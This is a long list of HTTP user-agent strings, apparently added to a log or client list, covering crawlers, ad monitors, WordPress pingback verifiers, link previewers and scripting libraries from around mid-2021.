+PHP/6.2.97 +PHP/7.2.87 +WordPress/5.8; https://kienthuctrade.net; verifying pingback from 115.87.233.244 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627345799-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627354647-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 MicroAdBot/1.1 (https://www.microad.co.jp/contact/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627363825-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627402064-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627410685-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627348339-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627357040-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627373501-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627373502-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627404131-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627412934-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1627415683-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1627423180-0 +YOURLS v1.7.2 +http://yourls.org/ (running on http://miv.im) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.k8s.crawler-production/1627374337-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627419407-0 +php-requests/1.8.1 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627403603-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627419405-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627431048-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627434878-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1627467189-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1627474027-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627477615-0 +WhatsApp/2.21.16.2 A +PHP/7.3.05 +PHP/6.3.30 +PHP/6.2.85 +PHP/5.2.09 +PHP/7.3.62 +PHP/6.3.78 +PHP/6.2.84 +WordPress/5.8; https://trebic.casd.cz; verifying pingback from 85.26.164.97 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627431371-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627435198-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627485568-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627432470-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627436129-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627438413-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627438419-0 +WhatsApp/2.21.141.1 i +WhatsApp/2.21.16.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-nonprod---sieve.hlfs-rest_client/1627476305-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1627467776-60 +CrawlAgent-BigInfoLabs/Nutch-2.3.1 (bil.gcs@biginfolabs.com) +WordPress/5.8; https://techilife.animei.xyz +WordPress/5.6.2; https://www.rockngem.com +okhttp/3.10.0.1 +Java/1.8.0_301 +WhatsApp/2.2126.15 N +WhatsApp/2.21.16.4 A +PHP/7.2.89 +PHP/5.2.49 +PHP/7.3.26 +PHP/7.2.57 +PHP/6.3.25 +PHP/7.2.76 +WordPress/5.8; http://schwartzandshapiro.com; verifying pingback from 85.26.165.73 +WordPress/4.5.24; http://nwmemorybox.com; verifying pingback from 31.173.103.245 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627520662-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627527493-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627566078-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627566108-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627517397-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627520509-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627522443-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627526894-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627540591-0 +Google-Raichu +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627584785-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627591318-0 +WordPress/5.2.11; http://informatique-plus.com +WordPress/5.4.6; https://wiemantech.com +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 PTST/210729.010942 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627587437-0 +WordPress/5.8; https://maketecheasier.animei.xyz +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627604086-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627609478-0 +PHP/5.3.07 +WordPress/5.7.2; https://feedmyshelf.com; verifying pingback from 172.69.22.252 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627604662-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627610116-10 +WhatsApp/2.21.16.5 A +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-15@moz.com) +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-api-01@moz.com) +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-38@moz.com) +rogerbot/1.2 (https://moz.com/help/guides/moz-procedures/what-is-rogerbot, rogerbot-crawler+aardwolf-crawler-25@moz.com) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627670727-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627670744-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627605810-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627611811-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627634913-0 +WordPress/5.8; https://howtogeek.animei.xyz +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627666613-0 +WhatsApp/2.21.15.16 A +WordPress/5.8; https://appuals.animei.xyz +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 PTST/210729.142522 +WordPress/5.7.2; https://tours.skhglobal.com +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.k8s.crawler-production/1627667901-0 +WordPress/5.8; https://wpthemes.co.in +WordPress.com; https://wpthemes.co.in +python-requests/2.6.0 CPython/3.8.9 Windows/10 +PHP/5.3.49 +PHP/5.3.52 +PHP/6.2.72 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627690894-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627697696-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627735728-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627692805-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627699149-0 +yacybot (/global; amd64 Linux 5.4.0-80-generic; java 11.0.11; Europe/de) http://yacy.net/bot.html +yacybot (/global; amd64 Linux 4.19.0-17-amd64; java 11.0.11; UTC/en) http://yacy.net/bot.html +test crawl/Nutch-1.18 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 8.1.0; SM-N900 ) U2/1.0.0 Mobile +WordPress/5.8; https://perfekt.ru +WordPress/5.8; https://www.techwhoop.com +TuneIn Radio/18.3.1 (Android 26; ASUS_Z016D; Java) +Apache-HttpClient/4.5.13 (Java/1.8.0_292) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 PTST/210730.181143 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Mobile Safari/537.36 PTST/210730.181143 +PHP/5.2.24 +PHP/5.3.86 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627778224-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627783387-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627789597-0 +ArchiveTeam ArchiveBot/20210627.0522ca3 (wpull 2.0.3) and not Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627841465-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627841476-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1627806655-60 +WordPress/5.7.2; https://7ik.ru +WordPress/5.8; https://onlyhow.net +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 OPR/76.0.4017.177 +WordPress.com; https://clavinfernandes.wordpress.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 7.1.2; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 4.4.2; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +WordPress/5.7; http://www.zuluz.co.za; verifying pingback from 187.122.248.194 +PHP/7.2.98 +PHP/5.2.77 +PHP/7.2.51 +WordPress/5.2.11; http://www.kozyr.top; verifying pingback from 194.156.175.40 +WordPress/5.5.5; https://www.ball-reallife.com; verifying pingback from 192.199.249.172 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627863392-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627864559-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627869389-10 +mbot v.1.16 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627865006-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627871553-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627877568-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627877641-0 +WordPress.com; https://greatsoundmusicacademy.wordpress.com +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36 PTST/210730.181143 +WhatsApp/2.21.16.7 A +WhatsApp/2.21.16.6 A +WordPress/5.7.2; http://guardinfo.online +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1627911420-60 +ddg_android/5.91.0 (com.duckduckgo.mobile.android; Android API 30) +WordPress/5.8; https://studioblue.co +WordPress/5.7.2; https://wtelecom.vn +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 PTST/210730.181143 +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd9uyqZNmfILhf0ctFWyBJhtree5Qw) +WordPress/5.8; https://bitlab.com.br/bitwiki +WordPress/4.7.21; http://www.hospitalsangabriel.com.mx; verifying pingback from 201.184.137.98 +PHP/6.2.62 +PHP/7.3.73 +PHP/6.3.22 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627950048-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627959397-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627965909-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627999124-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627999110-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627952011-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1627961424-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1627992131-0 +WhatsApp/2.21.14.25 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628017309-0 +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64 +Mozilla/5.0 (en-US) AppleWebKit/537.36 (KHTML, like Gecko; Widget Server) Chrome/91.0.4472.90 Safari/537.36 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/92.0.4515.119 Safari/537.36 +WordPress/5.8; https://ollimpia.ru +Java/15.0.2 +WhatsApp/2.21.150.15 i +WordPress/5.7.2; https://www.asterisk.org +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628088152-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628113763-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628039647-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628046424-0 +WhatsApp/2.21.15.18 A +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/92.0.4515.119 Mobile Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628081297-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +WordPress/5.3.8; https://lapki-tapki.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628081297-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628081296-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628081297-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628122596-0 +WordPress/5.7.2; https://staging-wwwasteriskorg.kinsta.cloud +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628129095-0 +MetaInspector/5.11.1 (+https://github.com/jaimeiniesta/metainspector) +WordPress/5.8; https://apisero.com +WordPress/5.8; https://foreignbanks.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628123177-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628129807-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628194126-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628194128-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628122879-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628125516-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628131904-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628136080-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628137372-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628146396-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628161857-0 +WhatsApp/2.21.16.9 A +Apache-HttpClient/4.5.13 (Java/1.8.0_302) +Apache-HttpClient/4.5.5 (Java/11.0.11) +Microsoft-WebDAV-MiniRedir/10.0.19044 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 4.4.2; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile +WordPress/5.8; https://greyhatmarketing.com +PostmanRuntime/7.28.3 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628188417-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628188418-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1628188418-10 +Apache-HttpClient/4.5.8 (Java/1.8.0_221) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628209024-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1628215508-0 +WordPress/5.6.2; 